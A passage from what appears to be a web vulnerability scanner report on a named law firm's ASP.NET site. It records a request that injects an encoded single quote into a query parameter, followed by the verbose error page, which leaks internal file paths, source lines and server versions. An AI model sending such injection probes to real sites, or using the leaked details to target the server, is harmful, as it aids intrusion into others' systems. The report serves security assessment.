[HttpException]: Unknown server tag 'uc1:NewsScroller1'.
at System.Web.UI.TemplateParser.ProcessBeginTag(Match match, String inputText)
at System.Web.UI.TemplateParser.ParseStringInternal(String text)
at System.Web.UI.TemplateParser.ParseString(String text, String virtualPath, String basePhysicalDir)
[HttpParseException]: Parser Error: Unknown server tag 'uc1:NewsScroller1'.
at System.Web.UI.TemplateParser.ParseString(String text, String virtualPath, String basePhysicalDir)
at System.Web.UI.TemplateParser.ParseFile(String filename, String virtualPath)
at System.Web.UI.TemplateParser.Parse()
at System.Web.UI.TemplateParser.GetParserCacheItemThroughCompilation()
at System.Web.UI.TemplateParser.GetParserCacheItemInternal(Boolean fCreateIfNotFound)
at System.Web.UI.TemplateParser.GetParserCacheItemWithNewConfigPath()
at System.Web.UI.TemplateControlParser.GetReferencedType(TemplateControlParser parser, String virtualPath)
at System.Web.UI.TemplateControlParser.GetUserControlType(String virtualPath)
at System.Web.UI.TemplateControlParser.ProcessDirective(String directiveName, IDictionary directive)
at System.Web.UI.TemplateParser.ParseStringInternal(String text)
at System.Web.UI.TemplateParser.ParseString(String text, String virtualPath, String basePhysicalDir)
[HttpException]: Parser Error: Parser Error: Unknown server tag 'uc1:NewsScroller1'.
at System.Web.UI.TemplateParser.ParseString(String text, String virtualPath, String basePhysicalDir)
at System.Web.UI.TemplateParser.ParseFile(String filename, String virtualPath)
at System.Web.UI.TemplateParser.Parse()
at System.Web.UI.TemplateParser.GetParserCacheItemThroughCompilation()
at System.Web.UI.TemplateParser.GetParserCacheItemInternal(Boolean fCreateIfNotFound)
at System.Web.UI.TemplateParser.GetParserCacheItemWithNewConfigPath()
at System.Web.UI.TemplateParser.GetParserCacheItem()
at System.Web.UI.TemplateControlParser.CompileAndGetParserCacheItem(String virtualPath, String inputFile, HttpContext context)
at System.Web.UI.TemplateControlParser.GetCompiledInstance(String virtualPath, String inputFile, HttpContext context)
at System.Web.UI.PageParser.GetCompiledPageInstanceInternal(String virtualPath, String inputFile, HttpContext context)
at System.Web.UI.PageHandlerFactory.GetHandler(HttpContext context, String requestType, String url, String path)
at System.Web.HttpApplication.MapHttpHandler(HttpContext context, String requestType, String path, String pathTranslated, Boolean useAppConfig)
at System.Web.MapHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
- /new/homenew.aspx

/new/homenew.aspx

http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=%2527

Identified Internal Path(s)

Request

GET /new/homenew.aspx?searchlink=showlocationnew.aspx&show=%2527 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 12 May 2011 16:22:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10423


<html>
<head>
<title>Input string was not in a correct format.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px}
b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px}
H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red }
H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon }
pre {font-family:"Lucida Console";font-size: .9em}
.marker {font-weight: bold; color: black;text-decoration: none;}
.version {color: gray;}
.error {margin-bottom: 10px;}
.expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
</style>
</head>

<body bgcolor="white">

<span><H1>Server Error in '/new' Application.<hr width=100% size=1 color=silver></H1>

<h2> <i>Input string was not in a correct format.</i> </h2></span>

<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">

<b> Description: </b>An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.

<br><br>

<b> Exception Details: </b>System.FormatException: Input string was not in a correct format.<br><br>

<b>Source Error:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

Line 185: &lt;%if (request.querystring(&quot;searchlink&quot;) = &quot;showlocationnew.aspx&quot;)%&gt;
Line 186: &lt;DIV id=&quot;submenu6&quot; style=&quot;width:200px;align:left;position:absolute;visibility:visible;&quot;&gt;
<font color=red>Line 187: &lt;%if (request.querystring(&quot;show&quot;) = libPages.Boston) then%&gt;
</font>Line 188: &lt;A href=&quot;homenew.aspx?searchlink=showlocationnew.aspx&amp;show=&lt;%=libPages.Boston%&gt;&quot;&gt;&lt;img onmouseover=&quot;this.src='images/New%20Mccarter/Navigation/boston_on.gif'&quot; onmouseout=&quot;this.src='images/New%20Mccarter/Navigation/boston.gif'&quot; src=&quot;images/New%20Mccarter/Navigation/boston_on.gif&quot; border=0&gt;&lt;/a&gt;&lt;A href=&quot;homenew.aspx?searchlink=showlocationnew.aspx&amp;show=&lt;%=libPages.Hartford%&gt;&quot;&gt;&lt;img onmouseover=&quot;this.src='images/New%20Mccarter/Navigation/hartford_on.gif'&quot; onmouseout=&quot;this.src='images/New%20Mccarter/Navigation/hartford.gif'&quot; src=&quot;images/New%20Mccarter/Navigation/hartford.gif&quot; border=0&gt;&lt;/a&gt;&lt;A href=&quot;homenew.aspx?searchlink=showlocationnew.aspx&amp;show=&lt;%=libPages.NewYork%&gt;&quot;&gt;&lt;img onmouseover=&quot;this.src='images/New%20Mccarter/Navigation/newyork_on.gif'&quot; onmouseout=&quot;this.src='images/New%20Mccarter/Navigation/newyork.gif'&quot; src=&quot;images/New%20Mccarter/Navigation/newyork.gif&quot; border=0&gt;&lt;/a&gt;&lt;A href=&quot;homenew.aspx?searchlink=showlocationnew.aspx&amp;show=&lt;%=libPages.Newark%&gt;&quot;&gt;&lt;img onmouseover=&quot;this.src='images/New%20Mccarter/Navigation/newark_on.gif'&quot; onmouseout=&quot;this.src='images/New%20Mccarter/Navigation/newark.gif'&quot; src=&quot;images/New%20Mccarter/Navigation/newark.gif&quot; border=0&gt;&lt;/a&gt;&lt;A href=&quot;homenew.aspx?searchlink=showlocationnew.aspx&amp;show=&lt;%=libPages.Philadelphia%&gt;&quot;&gt;&lt;img onmouseover=&quot;this.src='images/New%20Mccarter/Navigation/philadelphia_on.gif'&quot; onmouseout=&quot;this.src='images/New%20Mccarter/Navigation/philadelphia.gif'&quot; src=&quot;images/New%20Mccarter/Navigation/philadelphia.gif&quot; border=0&gt;&lt;/a&gt;&lt;A href=&quot;homenew.aspx?searchlink=showlocationnew.aspx&amp;show=&lt;%=libPages.Stamford%&gt;&quot;&gt;&lt;img onmouseover=&quot;this.src='images/New%20Mccarter/Navigation/stamford_on.gif'&quot; onmouseout=&quot;this.src='images/New%20Mccarter/Navigation/stamford.gif'&quot; src=&quot;images/New%20Mccarter/Navigation/stamford.gif&quot; border=0&gt;&lt;/a&gt;&lt;A href=&quot;homenew.aspx?searchlink=showlocationnew.aspx&amp;show=&lt;%=libPages.Wilmington%&gt;&quot;&gt;&lt;img onmouseover=&quot;this.src='images/New%20Mccarter/Navigation/wilmington_on.gif'&quot; onmouseout=&quot;this.src='images/New%20Mccarter/Navigation/wilmington.gif'&quot; src=&quot;images/New%20Mccarter/Navigation/wilmington.gif&quot; border=0&gt;&lt;/a&gt;
Line 189: &lt;%elseif (request.querystring(&quot;show&quot;) = libPages.Hartford) then%&gt; </pre></code>

</td>
</tr>
</table>

<br>

<b> Source File: </b> C:\inetpub\www.mccarter.com\new\nvMenu.ascx<b> &nbsp;&nbsp; Line: </b> 187
<br><br>

<b>Stack Trace:</b> <br><br>

<table width=100% bgcolor="#ffffcc">
<tr>
<td>
<code><pre>

[FormatException: Input string was not in a correct format.]
Microsoft.VisualBasic.CompilerServices.DoubleType.Parse(String Value, NumberFormatInfo NumberFormat) +193
Microsoft.VisualBasic.CompilerServices.DoubleType.FromString(String Value, NumberFormatInfo NumberFormat) +83

[InvalidCastException: Cast from string &quot;%27&quot; to type 'Double' is not valid.]
Microsoft.VisualBasic.CompilerServices.DoubleType.FromString(String Value, NumberFormatInfo NumberFormat) +172
Microsoft.VisualBasic.CompilerServices.DoubleType.FromString(String Value) +7
ASP.nvmenu_ascx.__Render__control1(HtmlTextWriter __output, Control parameterContainer) in C:\inetpub\www.mccarter.com\new\nvMenu.ascx:187
System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +27
System.Web.UI.Control.Render(HtmlTextWriter writer) +7
System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +241
ASP.nvtop_ascx.__Render__control1(HtmlTextWriter __output, Control parameterContainer) in C:\inetpub\www.mccarter.com\new\nvtop.ascx:149
System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +27
System.Web.UI.Control.Render(HtmlTextWriter writer) +7
System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +241
ASP.homenew_aspx.__RenderForm1(HtmlTextWriter __output, Control parameterContainer) in C:\inetpub\www.mccarter.com\new\homenew.aspx:99
System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +27
System.Web.UI.HtmlControls.HtmlForm.RenderChildren(HtmlTextWriter writer) +44
System.Web.UI.HtmlControls.HtmlForm.Render(HtmlTextWriter output) +263
System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +241
ASP.homenew_aspx.__Render__control1(HtmlTextWriter __output, Control parameterContainer) in C:\inetpub\www.mccarter.com\new\homenew.aspx:83
System.Web.UI.Control.RenderChildren(HtmlTextWriter writer) +27
System.Web.UI.Control.Render(HtmlTextWriter writer) +7
System.Web.UI.Control.RenderControl(HtmlTextWriter writer) +241
System.Web.UI.Page.ProcessRequestMain() +1926
</pre></code>

</td>
</tr>
</table>

<br>

<hr width=100% size=1 color=silver>

<b>Version Information:</b>&nbsp;Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2470

</font>

</body>
</html>
<!--
[FormatException]: Input string was not in a correct format.
at Microsoft.VisualBasic.CompilerServices.DoubleType.Parse(String Value, NumberFormatInfo NumberFormat)
at Microsoft.VisualBasic.CompilerServices.DoubleType.FromString(String Value, NumberFormatInfo NumberFormat)
[InvalidCastException]: Cast from string &quot;%27&quot; to type 'Double' is not valid.
at Microsoft.VisualBasic.CompilerServices.DoubleType.FromString(String Value, NumberFormatInfo NumberFormat)
at Microsoft.VisualBasic.CompilerServices.DoubleType.FromString(String Value)
at ASP.nvmenu_ascx.__Render__control1(HtmlTextWriter __output, Control parameterContainer) in C:\inetpub\www.mccarter.com\new\nvMenu.ascx:line 187
at System.Web.UI.Control.RenderChildren(HtmlTextWriter writer)
at System.Web.UI.Control.Render(HtmlTextWriter writer)
at System.Web.UI.Control.RenderControl(HtmlTextWriter writer)
at ASP.nvtop_ascx.__Render__control1(HtmlTextWriter __output, Control parameterContainer) in C:\inetpub\www.mccarter.com\new\nvtop.ascx:line 149
at System.Web.UI.Control.RenderChildren(HtmlTextWriter writer)
at System.Web.UI.Control.Render(HtmlTextWriter writer)
at System.Web.UI.Control.RenderControl(HtmlTextWriter writer)
at ASP.homenew_aspx.__RenderForm1(HtmlTextWriter __output, Control parameterContainer) in C:\inetpub\www.mccarter.com\new\homenew.aspx:line 99
at System.Web.UI.Control.RenderChildren(HtmlTextWriter writer)
at System.Web.UI.HtmlControls.HtmlForm.RenderChildren(HtmlTextWriter writer)
at System.Web.UI.HtmlControls.HtmlForm.Render(HtmlTextWriter output)
at System.Web.UI.Control.RenderControl(HtmlTextWriter writer)
at ASP.homenew_aspx.__Render__control1(HtmlTextWriter __output, Control parameterContainer) in C:\inetpub\www.mccarter.com\new\homenew.aspx:line 83
at System.Web.UI.Control.RenderChildren(HtmlTextWriter writer)
at System.Web.UI.Control.Render(HtmlTextWriter writer)
at System.Web.UI.Control.RenderControl(HtmlTextWriter writer)
at System.Web.UI.Page.ProcessRequestMain()
[HttpUnhandledException]: Exception of type System.Web.HttpUnhandledException was thrown.
at System.Web.UI.Page.HandleError(Exception e)
at System.Web.UI.Page.ProcessRequestMain()
at System.Web.UI.Page.ProcessRequest()
at System.Web.UI.Page.ProcessRequest(HttpContext context)
at System.Web.CallHandlerExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->